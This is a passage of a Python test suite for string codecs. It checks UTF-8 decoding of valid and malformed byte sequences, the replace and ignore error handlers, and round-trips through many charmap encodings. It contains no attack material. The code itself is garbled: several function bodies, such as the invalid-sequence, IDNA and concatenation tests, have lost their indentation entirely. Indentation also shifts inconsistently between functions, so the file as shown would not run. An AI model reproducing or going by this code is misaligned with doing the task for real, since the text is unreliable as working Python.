        b'\xe6\xad\xa3\xe7\xa2\xba\xe3\x81\xab\xe8\xa8\x80\xe3\x81'
        b'\x86\xe3\x81\xa8\xe7\xbf\xbb\xe8\xa8\xb3\xe3\x81\xaf\xe3'
        b'\x81\x95\xe3\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe'
        b'\xe3\x81\x9b\xe3\x82\x93\xe3\x80\x82\xe4\xb8\x80\xe9\x83'
        b'\xa8\xe3\x81\xaf\xe3\x83\x89\xe3\x82\xa4\xe3\x83\x84\xe8'
        b'\xaa\x9e\xe3\x81\xa7\xe3\x81\x99\xe3\x81\x8c\xe3\x80\x81'
        b'\xe3\x81\x82\xe3\x81\xa8\xe3\x81\xaf\xe3\x81\xa7\xe3\x81'
        b'\x9f\xe3\x82\x89\xe3\x82\x81\xe3\x81\xa7\xe3\x81\x99\xe3'
        b'\x80\x82\xe5\xae\x9f\xe9\x9a\x9b\xe3\x81\xab\xe3\x81\xaf'
        b'\xe3\x80\x8cWenn ist das Nunstuck git und'
    )
    # UTF-8 specific decoding tests
    self.assertEqual(str(b'\xf0\xa3\x91\x96', 'utf-8'), '\U00023456' )
    self.assertEqual(str(b'\xf0\x90\x80\x82', 'utf-8'), '\U00010002' )
    self.assertEqual(str(b'\xe2\x82\xac', 'utf-8'), '\u20ac' )
    # Other possible utf-8 test cases:
    # * strict decoding testing for all of the
    #   UTF8_ERROR cases in PyUnicode_DecodeUTF8
def test_utf8_decode_valid_sequences(self):
    """Decode one well-formed sequence at each UTF-8 boundary: the min
    and max code point representable in 1, 2, 3, and 4 bytes."""
    sequences = [
        # single byte
        (b'\x00', '\x00'), (b'a', 'a'), (b'\x7f', '\x7f'),
        # 2 bytes
        (b'\xc2\x80', '\x80'), (b'\xdf\xbf', '\u07ff'),
        # 3 bytes
        (b'\xe0\xa0\x80', '\u0800'), (b'\xed\x9f\xbf', '\ud7ff'),
        (b'\xee\x80\x80', '\uE000'), (b'\xef\xbf\xbf', '\uffff'),
        # 4 bytes
        (b'\xF0\x90\x80\x80', '\U00010000'),
        (b'\xf4\x8f\xbf\xbf', '\U0010FFFF')
    ]
    for seq, res in sequences:
        self.assertEqual(seq.decode('utf-8'), res)
def test_utf8_decode_invalid_sequences(self):
# continuation bytes in a sequence of 2, 3, or 4 bytes
continuation_bytes = [bytes([x]) for x in range(0x80, 0xC0)]
# start bytes of a 2-byte sequence equivalent to code points < 0x7F
invalid_2B_seq_start_bytes = [bytes([x]) for x in range(0xC0, 0xC2)]
# start bytes of a 4-byte sequence equivalent to code points > 0x10FFFF
invalid_4B_seq_start_bytes = [bytes([x]) for x in range(0xF5, 0xF8)]
invalid_start_bytes = (
continuation_bytes + invalid_2B_seq_start_bytes +
invalid_4B_seq_start_bytes + [bytes([x]) for x in range(0xF7, 0x100)]
)
for byte in invalid_start_bytes:
self.assertRaises(UnicodeDecodeError, byte.decode, 'utf-8')
for sb in invalid_2B_seq_start_bytes:
for cb in continuation_bytes:
self.assertRaises(UnicodeDecodeError, (sb+cb).decode, 'utf-8')
for sb in invalid_4B_seq_start_bytes:
for cb1 in continuation_bytes[:3]:
for cb3 in continuation_bytes[:3]:
self.assertRaises(UnicodeDecodeError,
(sb+cb1+b'\x80'+cb3).decode, 'utf-8')
for cb in [bytes([x]) for x in range(0x80, 0xA0)]:
self.assertRaises(UnicodeDecodeError,
(b'\xE0'+cb+b'\x80').decode, 'utf-8')
self.assertRaises(UnicodeDecodeError,
(b'\xE0'+cb+b'\xBF').decode, 'utf-8')
# surrogates
for cb in [bytes([x]) for x in range(0xA0, 0xC0)]:
self.assertRaises(UnicodeDecodeError,
(b'\xED'+cb+b'\x80').decode, 'utf-8')
self.assertRaises(UnicodeDecodeError,
(b'\xED'+cb+b'\xBF').decode, 'utf-8')
for cb in [bytes([x]) for x in range(0x80, 0x90)]:
self.assertRaises(UnicodeDecodeError,
(b'\xF0'+cb+b'\x80\x80').decode, 'utf-8')
self.assertRaises(UnicodeDecodeError,
(b'\xF0'+cb+b'\xBF\xBF').decode, 'utf-8')
for cb in [bytes([x]) for x in range(0x90, 0xC0)]:
self.assertRaises(UnicodeDecodeError,
(b'\xF4'+cb+b'\x80\x80').decode, 'utf-8')
self.assertRaises(UnicodeDecodeError,
(b'\xF4'+cb+b'\xBF\xBF').decode, 'utf-8')
def test_issue8271(self):
    """UTF-8 error recovery (issue #8271): only the maximal well-formed
    prefix of a bad sequence is consumed per U+FFFD, so each table entry
    pairs a malformed byte string with its exact 'replace' output."""
    # Issue #8271: during the decoding of an invalid UTF-8 byte sequence,
    # only the start byte and the continuation byte(s) are now considered
    # invalid, instead of the number of bytes specified by the start byte.
    # See http://www.unicode.org/versions/Unicode5.2.0/ch03.pdf (page 95,
    # table 3-8, Row 2) for more information about the algorithm used.
    FFFD = '\ufffd'
    sequences = [
        # invalid start bytes
        (b'\x80', FFFD), # continuation byte
        (b'\x80\x80', FFFD*2), # 2 continuation bytes
        (b'\xc0', FFFD),
        (b'\xc0\xc0', FFFD*2),
        (b'\xc1', FFFD),
        (b'\xc1\xc0', FFFD*2),
        (b'\xc0\xc1', FFFD*2),
        # with start byte of a 2-byte sequence
        (b'\xc2', FFFD), # only the start byte
        (b'\xc2\xc2', FFFD*2), # 2 start bytes
        (b'\xc2\xc2\xc2', FFFD*3), # 3 start bytes
        (b'\xc2\x41', FFFD+'A'), # invalid continuation byte
        # with start byte of a 3-byte sequence
        (b'\xe1', FFFD), # only the start byte
        (b'\xe1\xe1', FFFD*2), # 2 start bytes
        (b'\xe1\xe1\xe1', FFFD*3), # 3 start bytes
        (b'\xe1\xe1\xe1\xe1', FFFD*4), # 4 start bytes
        (b'\xe1\x80', FFFD), # only 1 continuation byte
        (b'\xe1\x41', FFFD+'A'), # invalid continuation byte
        (b'\xe1\x41\x80', FFFD+'A'+FFFD), # invalid cb followed by valid cb
        (b'\xe1\x41\x41', FFFD+'AA'), # 2 invalid continuation bytes
        (b'\xe1\x80\x41', FFFD+'A'), # only 1 valid continuation byte
        (b'\xe1\x80\xe1\x41', FFFD*2+'A'), # 1 valid and the other invalid
        (b'\xe1\x41\xe1\x80', FFFD+'A'+FFFD), # 1 invalid and the other valid
        # with start byte of a 4-byte sequence
        (b'\xf1', FFFD), # only the start byte
        (b'\xf1\xf1', FFFD*2), # 2 start bytes
        (b'\xf1\xf1\xf1', FFFD*3), # 3 start bytes
        (b'\xf1\xf1\xf1\xf1', FFFD*4), # 4 start bytes
        (b'\xf1\xf1\xf1\xf1\xf1', FFFD*5), # 5 start bytes
        (b'\xf1\x80', FFFD), # only 1 continuation bytes
        (b'\xf1\x80\x80', FFFD), # only 2 continuation bytes
        (b'\xf1\x80\x41', FFFD+'A'), # 1 valid cb and 1 invalid
        (b'\xf1\x80\x41\x41', FFFD+'AA'), # 1 valid cb and 1 invalid
        (b'\xf1\x80\x80\x41', FFFD+'A'), # 2 valid cb and 1 invalid
        (b'\xf1\x41\x80', FFFD+'A'+FFFD), # 1 invalid cv and 1 valid
        (b'\xf1\x41\x80\x80', FFFD+'A'+FFFD*2), # 1 invalid cb and 2 invalid
        (b'\xf1\x41\x80\x41', FFFD+'A'+FFFD+'A'), # 2 invalid cb and 1 invalid
        (b'\xf1\x41\x41\x80', FFFD+'AA'+FFFD), # 1 valid cb and 1 invalid
        (b'\xf1\x41\xf1\x80', FFFD+'A'+FFFD),
        (b'\xf1\x41\x80\xf1', FFFD+'A'+FFFD*2),
        (b'\xf1\xf1\x80\x41', FFFD*2+'A'),
        (b'\xf1\x41\xf1\xf1', FFFD+'A'+FFFD*2),
        # with invalid start byte of a 4-byte sequence (rfc2279)
        (b'\xf5', FFFD), # only the start byte
        (b'\xf5\xf5', FFFD*2), # 2 start bytes
        (b'\xf5\x80', FFFD*2), # only 1 continuation byte
        (b'\xf5\x80\x80', FFFD*3), # only 2 continuation byte
        (b'\xf5\x80\x80\x80', FFFD*4), # 3 continuation bytes
        (b'\xf5\x80\x41', FFFD*2+'A'), #  1 valid cb and 1 invalid
        (b'\xf5\x80\x41\xf5', FFFD*2+'A'+FFFD),
        (b'\xf5\x41\x80\x80\x41', FFFD+'A'+FFFD*2+'A'),
        # with invalid start byte of a 5-byte sequence (rfc2279)
        (b'\xf8', FFFD), # only the start byte
        (b'\xf8\xf8', FFFD*2), # 2 start bytes
        (b'\xf8\x80', FFFD*2), # only one continuation byte
        (b'\xf8\x80\x41', FFFD*2 + 'A'), # 1 valid cb and 1 invalid
        (b'\xf8\x80\x80\x80\x80', FFFD*5), # invalid 5 bytes seq with 5 bytes
        # with invalid start byte of a 6-byte sequence (rfc2279)
        (b'\xfc', FFFD), # only the start byte
        (b'\xfc\xfc', FFFD*2), # 2 start bytes
        (b'\xfc\x80\x80', FFFD*3), # only 2 continuation bytes
        (b'\xfc\x80\x80\x80\x80\x80', FFFD*6), # 6 continuation bytes
        # invalid start byte
        (b'\xfe', FFFD),
        (b'\xfe\x80\x80', FFFD*3),
        # other sequences
        (b'\xf1\x80\x41\x42\x43', '\ufffd\x41\x42\x43'),
        (b'\xf1\x80\xff\x42\x43', '\ufffd\ufffd\x42\x43'),
        (b'\xf1\x80\xc2\x81\x43', '\ufffd\x81\x43'),
        (b'\x61\xF1\x80\x80\xE1\x80\xC2\x62\x80\x63\x80\xBF\x64',
         '\x61\uFFFD\uFFFD\uFFFD\x62\uFFFD\x63\uFFFD\uFFFD\x64'),
    ]
    for n, (seq, res) in enumerate(sequences):
        self.assertRaises(UnicodeDecodeError, seq.decode, 'utf-8', 'strict')
        self.assertEqual(seq.decode('utf-8', 'replace'), res)
        self.assertEqual((seq+b'b').decode('utf-8', 'replace'), res+'b')
        self.assertEqual(seq.decode('utf-8', 'ignore'),
                         res.replace('\uFFFD', ''))
def assertCorrectUTF8Decoding(self, seq, res, err):
    """
    Check that decoding the invalid UTF-8 byte sequence `seq` raises a
    UnicodeDecodeError whose message contains `err` when 'strict' is
    used, that it decodes to `res` when 'replace' is used (also when
    embedded between valid ASCII runs), and that with 'ignore' the
    output equals `res` with every U+FFFD dropped.
    """
    with self.assertRaises(UnicodeDecodeError) as cm:
        seq.decode('utf-8')
    exc = cm.exception
    self.assertIn(err, str(exc))
    self.assertEqual(seq.decode('utf-8', 'replace'), res)
    self.assertEqual((b'aaaa' + seq + b'bbbb').decode('utf-8', 'replace'),
                     'aaaa' + res + 'bbbb')
    res = res.replace('\ufffd', '')
    self.assertEqual(seq.decode('utf-8', 'ignore'), res)
    self.assertEqual((b'aaaa' + seq + b'bbbb').decode('utf-8', 'ignore'),
                     'aaaa' + res + 'bbbb')
def test_invalid_start_byte(self):
    """
    Test that an 'invalid start byte' error is raised when the first byte
    is not in the ASCII range or is not a valid start byte of a 2-, 3-, or
    4-bytes sequence. The invalid start byte is replaced with a single
    U+FFFD when errors='replace'.
    E.g. <80> is a continuation byte and can appear only after a start byte.
    """
    FFFD = '\ufffd'
    for byte in b'\x80\xA0\x9F\xBF\xC0\xC1\xF5\xFF':
        # fix: use the FFFD constant (it was defined but unused, with the
        # literal repeated inline instead)
        self.assertCorrectUTF8Decoding(bytes([byte]), FFFD,
                                       'invalid start byte')
def test_unexpected_end_of_data(self):
    """
    Test that an 'unexpected end of data' error is raised when the string
    ends after a start byte of a 2-, 3-, or 4-bytes sequence without having
    enough continuation bytes.  The incomplete sequence is replaced with a
    single U+FFFD when errors='replace'.
    E.g. in the sequence <F3 80 80>, F3 is the start byte of a 4-bytes
    sequence, but it's followed by only 2 valid continuation bytes and the
    last continuation bytes is missing.
    Note: the continuation bytes must be all valid, if one of them is
    invalid another error will be raised.
    """
    sequences = [
        'C2', 'DF',
        'E0 A0', 'E0 BF', 'E1 80', 'E1 BF', 'EC 80', 'EC BF',
        'ED 80', 'ED 9F', 'EE 80', 'EE BF', 'EF 80', 'EF BF',
        'F0 90', 'F0 BF', 'F0 90 80', 'F0 90 BF', 'F0 BF 80', 'F0 BF BF',
        'F1 80', 'F1 BF', 'F1 80 80', 'F1 80 BF', 'F1 BF 80', 'F1 BF BF',
        'F3 80', 'F3 BF', 'F3 80 80', 'F3 80 BF', 'F3 BF 80', 'F3 BF BF',
        'F4 80', 'F4 8F', 'F4 80 80', 'F4 80 BF', 'F4 8F 80', 'F4 8F BF'
    ]
    FFFD = '\ufffd'
    for seq in sequences:
        # fix: use the FFFD constant (it was defined but unused, with the
        # literal repeated inline instead)
        self.assertCorrectUTF8Decoding(bytes.fromhex(seq), FFFD,
                                       'unexpected end of data')
def test_invalid_cb_for_2bytes_seq(self):
    """
    Test that an 'invalid continuation byte' error is raised when the
    continuation byte of a 2-bytes sequence is invalid.  The start byte
    is replaced by a single U+FFFD and the second byte is handled
    separately when errors='replace'.
    E.g. in the sequence <C2 41>, C2 is the start byte of a 2-bytes
    sequence, but 41 is not a valid continuation byte because it's the
    ASCII letter 'A'.
    """
    FFFD = '\ufffd'
    FFFDx2 = FFFD * 2
    # (hex sequence, expected 'replace' output): an ASCII second byte
    # survives on its own; a non-continuation second byte becomes FFFD too
    sequences = [
        ('C2 00', FFFD+'\x00'), ('C2 7F', FFFD+'\x7f'),
        ('C2 C0', FFFDx2), ('C2 FF', FFFDx2),
        ('DF 00', FFFD+'\x00'), ('DF 7F', FFFD+'\x7f'),
        ('DF C0', FFFDx2), ('DF FF', FFFDx2),
    ]
    for seq, res in sequences:
        self.assertCorrectUTF8Decoding(bytes.fromhex(seq), res,
                                       'invalid continuation byte')
def test_invalid_cb_for_3bytes_seq(self):
    """
    Test that an 'invalid continuation byte' error is raised when the
    continuation byte(s) of a 3-bytes sequence are invalid.  When
    errors='replace', if the first continuation byte is valid, the first
    two bytes (start byte + 1st cb) are replaced by a single U+FFFD and the
    third byte is handled separately, otherwise only the start byte is
    replaced with a U+FFFD and the other continuation bytes are handled
    separately.
    E.g. in the sequence <E1 80 41>, E1 is the start byte of a 3-bytes
    sequence, 80 is a valid continuation byte, but 41 is not a valid cb
    because it's the ASCII letter 'A'.
    Note: when the start byte is E0 or ED, the valid ranges for the first
    continuation byte are limited to A0..BF and 80..9F respectively.
    Python 2 used to consider all the bytes in range 80..BF valid when the
    start byte was ED.  This is fixed in Python 3.
    """
    FFFD = '\ufffd'
    FFFDx2 = FFFD * 2
    sequences = [
        ('E0 00', FFFD+'\x00'), ('E0 7F', FFFD+'\x7f'), ('E0 80', FFFDx2),
        ('E0 9F', FFFDx2), ('E0 C0', FFFDx2), ('E0 FF', FFFDx2),
        ('E0 A0 00', FFFD+'\x00'), ('E0 A0 7F', FFFD+'\x7f'),
        ('E0 A0 C0', FFFDx2), ('E0 A0 FF', FFFDx2),
        ('E0 BF 00', FFFD+'\x00'), ('E0 BF 7F', FFFD+'\x7f'),
        ('E0 BF C0', FFFDx2), ('E0 BF FF', FFFDx2), ('E1 00', FFFD+'\x00'),
        ('E1 7F', FFFD+'\x7f'), ('E1 C0', FFFDx2), ('E1 FF', FFFDx2),
        ('E1 80 00', FFFD+'\x00'), ('E1 80 7F', FFFD+'\x7f'),
        ('E1 80 C0', FFFDx2), ('E1 80 FF', FFFDx2),
        ('E1 BF 00', FFFD+'\x00'), ('E1 BF 7F', FFFD+'\x7f'),
        ('E1 BF C0', FFFDx2), ('E1 BF FF', FFFDx2), ('EC 00', FFFD+'\x00'),
        ('EC 7F', FFFD+'\x7f'), ('EC C0', FFFDx2), ('EC FF', FFFDx2),
        ('EC 80 00', FFFD+'\x00'), ('EC 80 7F', FFFD+'\x7f'),
        ('EC 80 C0', FFFDx2), ('EC 80 FF', FFFDx2),
        ('EC BF 00', FFFD+'\x00'), ('EC BF 7F', FFFD+'\x7f'),
        ('EC BF C0', FFFDx2), ('EC BF FF', FFFDx2), ('ED 00', FFFD+'\x00'),
        ('ED 7F', FFFD+'\x7f'),
        ('ED A0', FFFDx2), ('ED BF', FFFDx2), # see note ^
        ('ED C0', FFFDx2), ('ED FF', FFFDx2), ('ED 80 00', FFFD+'\x00'),
        ('ED 80 7F', FFFD+'\x7f'), ('ED 80 C0', FFFDx2),
        ('ED 80 FF', FFFDx2), ('ED 9F 00', FFFD+'\x00'),
        ('ED 9F 7F', FFFD+'\x7f'), ('ED 9F C0', FFFDx2),
        ('ED 9F FF', FFFDx2), ('EE 00', FFFD+'\x00'),
        ('EE 7F', FFFD+'\x7f'), ('EE C0', FFFDx2), ('EE FF', FFFDx2),
        ('EE 80 00', FFFD+'\x00'), ('EE 80 7F', FFFD+'\x7f'),
        ('EE 80 C0', FFFDx2), ('EE 80 FF', FFFDx2),
        ('EE BF 00', FFFD+'\x00'), ('EE BF 7F', FFFD+'\x7f'),
        ('EE BF C0', FFFDx2), ('EE BF FF', FFFDx2), ('EF 00', FFFD+'\x00'),
        ('EF 7F', FFFD+'\x7f'), ('EF C0', FFFDx2), ('EF FF', FFFDx2),
        ('EF 80 00', FFFD+'\x00'), ('EF 80 7F', FFFD+'\x7f'),
        ('EF 80 C0', FFFDx2), ('EF 80 FF', FFFDx2),
        ('EF BF 00', FFFD+'\x00'), ('EF BF 7F', FFFD+'\x7f'),
        ('EF BF C0', FFFDx2), ('EF BF FF', FFFDx2),
    ]
    for seq, res in sequences:
        self.assertCorrectUTF8Decoding(bytes.fromhex(seq), res,
                                       'invalid continuation byte')
def test_invalid_cb_for_4bytes_seq(self):
    """
    Test that an 'invalid continuation byte' error is raised when the
    continuation byte(s) of a 4-bytes sequence are invalid.  When
    errors='replace', the start byte and all the following valid
    continuation bytes are replaced with a single U+FFFD, and all the bytes
    starting from the first invalid continuation byte (included) are
    handled separately.
    E.g. in the sequence <F1 80 41>, F1 is the start byte of a 4-bytes
    sequence, 80 is a valid continuation byte, but 41 is not a valid cb
    because it's the ASCII letter 'A'.
    Note: when the start byte is F0 or F4, the valid ranges for the first
    continuation byte are limited to 90..BF and 80..8F respectively.
    """
    FFFD = '\ufffd'
    FFFDx2 = FFFD * 2
    sequences = [
        ('F0 00', FFFD+'\x00'), ('F0 7F', FFFD+'\x7f'), ('F0 80', FFFDx2),
        ('F0 8F', FFFDx2), ('F0 C0', FFFDx2), ('F0 FF', FFFDx2),
        ('F0 90 00', FFFD+'\x00'), ('F0 90 7F', FFFD+'\x7f'),
        ('F0 90 C0', FFFDx2), ('F0 90 FF', FFFDx2),
        ('F0 BF 00', FFFD+'\x00'), ('F0 BF 7F', FFFD+'\x7f'),
        ('F0 BF C0', FFFDx2), ('F0 BF FF', FFFDx2),
        ('F0 90 80 00', FFFD+'\x00'), ('F0 90 80 7F', FFFD+'\x7f'),
        ('F0 90 80 C0', FFFDx2), ('F0 90 80 FF', FFFDx2),
        ('F0 90 BF 00', FFFD+'\x00'), ('F0 90 BF 7F', FFFD+'\x7f'),
        ('F0 90 BF C0', FFFDx2), ('F0 90 BF FF', FFFDx2),
        ('F0 BF 80 00', FFFD+'\x00'), ('F0 BF 80 7F', FFFD+'\x7f'),
        ('F0 BF 80 C0', FFFDx2), ('F0 BF 80 FF', FFFDx2),
        ('F0 BF BF 00', FFFD+'\x00'), ('F0 BF BF 7F', FFFD+'\x7f'),
        ('F0 BF BF C0', FFFDx2), ('F0 BF BF FF', FFFDx2),
        ('F1 00', FFFD+'\x00'), ('F1 7F', FFFD+'\x7f'), ('F1 C0', FFFDx2),
        ('F1 FF', FFFDx2), ('F1 80 00', FFFD+'\x00'),
        ('F1 80 7F', FFFD+'\x7f'), ('F1 80 C0', FFFDx2),
        ('F1 80 FF', FFFDx2), ('F1 BF 00', FFFD+'\x00'),
        ('F1 BF 7F', FFFD+'\x7f'), ('F1 BF C0', FFFDx2),
        ('F1 BF FF', FFFDx2), ('F1 80 80 00', FFFD+'\x00'),
        ('F1 80 80 7F', FFFD+'\x7f'), ('F1 80 80 C0', FFFDx2),
        ('F1 80 80 FF', FFFDx2), ('F1 80 BF 00', FFFD+'\x00'),
        ('F1 80 BF 7F', FFFD+'\x7f'), ('F1 80 BF C0', FFFDx2),
        ('F1 80 BF FF', FFFDx2), ('F1 BF 80 00', FFFD+'\x00'),
        ('F1 BF 80 7F', FFFD+'\x7f'), ('F1 BF 80 C0', FFFDx2),
        ('F1 BF 80 FF', FFFDx2), ('F1 BF BF 00', FFFD+'\x00'),
        ('F1 BF BF 7F', FFFD+'\x7f'), ('F1 BF BF C0', FFFDx2),
        ('F1 BF BF FF', FFFDx2), ('F3 00', FFFD+'\x00'),
        ('F3 7F', FFFD+'\x7f'), ('F3 C0', FFFDx2), ('F3 FF', FFFDx2),
        ('F3 80 00', FFFD+'\x00'), ('F3 80 7F', FFFD+'\x7f'),
        ('F3 80 C0', FFFDx2), ('F3 80 FF', FFFDx2),
        ('F3 BF 00', FFFD+'\x00'), ('F3 BF 7F', FFFD+'\x7f'),
        ('F3 BF C0', FFFDx2), ('F3 BF FF', FFFDx2),
        ('F3 80 80 00', FFFD+'\x00'), ('F3 80 80 7F', FFFD+'\x7f'),
        ('F3 80 80 C0', FFFDx2), ('F3 80 80 FF', FFFDx2),
        ('F3 80 BF 00', FFFD+'\x00'), ('F3 80 BF 7F', FFFD+'\x7f'),
        ('F3 80 BF C0', FFFDx2), ('F3 80 BF FF', FFFDx2),
        ('F3 BF 80 00', FFFD+'\x00'), ('F3 BF 80 7F', FFFD+'\x7f'),
        ('F3 BF 80 C0', FFFDx2), ('F3 BF 80 FF', FFFDx2),
        ('F3 BF BF 00', FFFD+'\x00'), ('F3 BF BF 7F', FFFD+'\x7f'),
        ('F3 BF BF C0', FFFDx2), ('F3 BF BF FF', FFFDx2),
        ('F4 00', FFFD+'\x00'), ('F4 7F', FFFD+'\x7f'), ('F4 90', FFFDx2),
        ('F4 BF', FFFDx2), ('F4 C0', FFFDx2), ('F4 FF', FFFDx2),
        ('F4 80 00', FFFD+'\x00'), ('F4 80 7F', FFFD+'\x7f'),
        ('F4 80 C0', FFFDx2), ('F4 80 FF', FFFDx2),
        ('F4 8F 00', FFFD+'\x00'), ('F4 8F 7F', FFFD+'\x7f'),
        ('F4 8F C0', FFFDx2), ('F4 8F FF', FFFDx2),
        ('F4 80 80 00', FFFD+'\x00'), ('F4 80 80 7F', FFFD+'\x7f'),
        ('F4 80 80 C0', FFFDx2), ('F4 80 80 FF', FFFDx2),
        ('F4 80 BF 00', FFFD+'\x00'), ('F4 80 BF 7F', FFFD+'\x7f'),
        ('F4 80 BF C0', FFFDx2), ('F4 80 BF FF', FFFDx2),
        ('F4 8F 80 00', FFFD+'\x00'), ('F4 8F 80 7F', FFFD+'\x7f'),
        ('F4 8F 80 C0', FFFDx2), ('F4 8F 80 FF', FFFDx2),
        ('F4 8F BF 00', FFFD+'\x00'), ('F4 8F BF 7F', FFFD+'\x7f'),
        ('F4 8F BF C0', FFFDx2), ('F4 8F BF FF', FFFDx2)
    ]
    for seq, res in sequences:
        self.assertCorrectUTF8Decoding(bytes.fromhex(seq), res,
                                       'invalid continuation byte')
def test_codecs_idna(self):
# Test whether trailing dot is preserved
self.assertEqual("www.python.org.".encode("idna"), b"www.python.org.")
def test_codecs_errors(self):
    """Error handling in encode()/decode(): the strict/ignore/replace
    handlers, unknown \\N{...} names, truncated escapes, bad codec names,
    wrong argument types, and lone surrogates passed to float/complex."""
    # Error handling (encoding)
    self.assertRaises(UnicodeError, 'Andr\202 x'.encode, 'ascii')
    self.assertRaises(UnicodeError, 'Andr\202 x'.encode, 'ascii','strict')
    self.assertEqual('Andr\202 x'.encode('ascii','ignore'), b"Andr x")
    self.assertEqual('Andr\202 x'.encode('ascii','replace'), b"Andr? x")
    # positional and keyword forms of errors= must agree
    self.assertEqual('Andr\202 x'.encode('ascii', 'replace'),
                     'Andr\202 x'.encode('ascii', errors='replace'))
    self.assertEqual('Andr\202 x'.encode('ascii', 'ignore'),
                     'Andr\202 x'.encode(encoding='ascii', errors='ignore'))
    # Error handling (decoding)
    self.assertRaises(UnicodeError, str, b'Andr\202 x', 'ascii')
    self.assertRaises(UnicodeError, str, b'Andr\202 x', 'ascii', 'strict')
    self.assertEqual(str(b'Andr\202 x', 'ascii', 'ignore'), "Andr x")
    self.assertEqual(str(b'Andr\202 x', 'ascii', 'replace'), 'Andr\uFFFD x')
    self.assertEqual(str(b'\202 x', 'ascii', 'replace'), '\uFFFD x')
    # Error handling (unknown character names)
    self.assertEqual(b"\\N{foo}xx".decode("unicode-escape", "ignore"), "xx")
    # Error handling (truncated escape sequence)
    self.assertRaises(UnicodeError, b"\\".decode, "unicode-escape")
    # codecs registered with non-text results must be rejected
    self.assertRaises(TypeError, b"hello".decode, "test.unicode1")
    self.assertRaises(TypeError, str, b"hello", "test.unicode2")
    self.assertRaises(TypeError, "hello".encode, "test.unicode1")
    self.assertRaises(TypeError, "hello".encode, "test.unicode2")
    # Error handling (wrong arguments)
    self.assertRaises(TypeError, "hello".encode, 42, 42, 42)
    # Error handling (lone surrogate in PyUnicode_TransformDecimalToASCII())
    self.assertRaises(UnicodeError, float, "\ud800")
    self.assertRaises(UnicodeError, float, "\udf00")
    self.assertRaises(UnicodeError, complex, "\ud800")
    self.assertRaises(UnicodeError, complex, "\udf00")
    def test_codecs(self):
        """Round-trip sanity checks for the standard text codecs.

        Encodes fixed samples, then verifies encode->decode round-trips over
        progressively restricted code-point ranges (BMP for the universal
        codecs, Latin-1 range, ASCII range, a few non-BMP chars, and the
        full non-surrogate range for UTF-8).
        """
        # Encoding
        self.assertEqual('hello'.encode('ascii'), b'hello')
        self.assertEqual('hello'.encode('utf-7'), b'hello')
        self.assertEqual('hello'.encode('utf-8'), b'hello')
        self.assertEqual('hello'.encode('utf-8'), b'hello')
        self.assertEqual('hello'.encode('utf-16-le'), b'h\000e\000l\000l\000o\000')
        self.assertEqual('hello'.encode('utf-16-be'), b'\000h\000e\000l\000l\000o')
        self.assertEqual('hello'.encode('latin-1'), b'hello')
        # Default encoding is utf-8
        self.assertEqual('\u2603'.encode(), b'\xe2\x98\x83')
        # Roundtrip safety for BMP (just the first 1024 chars)
        for c in range(1024):
            u = chr(c)
            for encoding in ('utf-7', 'utf-8', 'utf-16', 'utf-16-le',
                             'utf-16-be', 'raw_unicode_escape',
                             'unicode_escape', 'unicode_internal'):
                with warnings.catch_warnings():
                    # unicode-internal has been deprecated
                    warnings.simplefilter("ignore", DeprecationWarning)
                    self.assertEqual(str(u.encode(encoding),encoding), u)
        # Roundtrip safety for BMP (just the first 256 chars)
        for c in range(256):
            u = chr(c)
            for encoding in ('latin-1',):
                self.assertEqual(str(u.encode(encoding),encoding), u)
        # Roundtrip safety for BMP (just the first 128 chars)
        for c in range(128):
            u = chr(c)
            for encoding in ('ascii',):
                self.assertEqual(str(u.encode(encoding),encoding), u)
        # Roundtrip safety for non-BMP (just a few chars)
        with warnings.catch_warnings():
            # unicode-internal has been deprecated
            warnings.simplefilter("ignore", DeprecationWarning)
            u = '\U00010001\U00020002\U00030003\U00040004\U00050005'
            for encoding in ('utf-8', 'utf-16', 'utf-16-le', 'utf-16-be',
                             'raw_unicode_escape',
                             'unicode_escape', 'unicode_internal'):
                self.assertEqual(str(u.encode(encoding),encoding), u)
        # UTF-8 must be roundtrip safe for all code points
        # (except surrogates, which are forbidden).
        u = ''.join(map(chr, list(range(0, 0xd800)) +
                             list(range(0xe000, 0x110000))))
        for encoding in ('utf-8',):
            self.assertEqual(str(u.encode(encoding),encoding), u)
    def test_codecs_charmap(self):
        """Round-trip all single-byte charmap codecs over their byte ranges.

        Bytes 0-127 round-trip for every listed codec; bytes 128-255 only
        for codecs whose upper half is fully defined and reversible (the
        commented-out names have undefined mappings or fail the round-trip).
        """
        # 0-127
        s = bytes(range(128))
        for encoding in (
            'cp037', 'cp1026', 'cp273',
            'cp437', 'cp500', 'cp720', 'cp737', 'cp775', 'cp850',
            'cp852', 'cp855', 'cp858', 'cp860', 'cp861', 'cp862',
            'cp863', 'cp865', 'cp866', 'cp1125',
            'iso8859_10', 'iso8859_13', 'iso8859_14', 'iso8859_15',
            'iso8859_2', 'iso8859_3', 'iso8859_4', 'iso8859_5', 'iso8859_6',
            'iso8859_7', 'iso8859_9',
            'koi8_r', 'koi8_t', 'koi8_u', 'kz1048', 'latin_1',
            'mac_cyrillic', 'mac_latin2',
            'cp1250', 'cp1251', 'cp1252', 'cp1253', 'cp1254', 'cp1255',
            'cp1256', 'cp1257', 'cp1258',
            'cp856', 'cp857', 'cp864', 'cp869', 'cp874',
            'mac_greek', 'mac_iceland','mac_roman', 'mac_turkish',
            'cp1006', 'iso8859_8',
            ### These have undefined mappings:
            #'cp424',
            ### These fail the round-trip:
            #'cp875'
            ):
            self.assertEqual(str(s, encoding).encode(encoding), s)
        # 128-255
        s = bytes(range(128, 256))
        for encoding in (
            'cp037', 'cp1026', 'cp273',
            'cp437', 'cp500', 'cp720', 'cp737', 'cp775', 'cp850',
            'cp852', 'cp855', 'cp858', 'cp860', 'cp861', 'cp862',
            'cp863', 'cp865', 'cp866', 'cp1125',
            'iso8859_10', 'iso8859_13', 'iso8859_14', 'iso8859_15',
            'iso8859_2', 'iso8859_4', 'iso8859_5',
            'iso8859_9', 'koi8_r', 'koi8_u', 'latin_1',
            'mac_cyrillic', 'mac_latin2',
            ### These have undefined mappings:
            #'cp1250', 'cp1251', 'cp1252', 'cp1253', 'cp1254', 'cp1255',
            #'cp1256', 'cp1257', 'cp1258',
            #'cp424', 'cp856', 'cp857', 'cp864', 'cp869', 'cp874',
            #'iso8859_3', 'iso8859_6', 'iso8859_7', 'koi8_t', 'kz1048',
            #'mac_greek', 'mac_iceland','mac_roman', 'mac_turkish',
            ### These fail the round-trip:
            #'cp1006', 'cp875', 'iso8859_8',
            ):
            self.assertEqual(str(s, encoding).encode(encoding), s)
def test_concatenation(self):
self.assertEqual(("abc" "def"), "abcdef")
self.assertEqual(("abc" "def"), "abcdef")
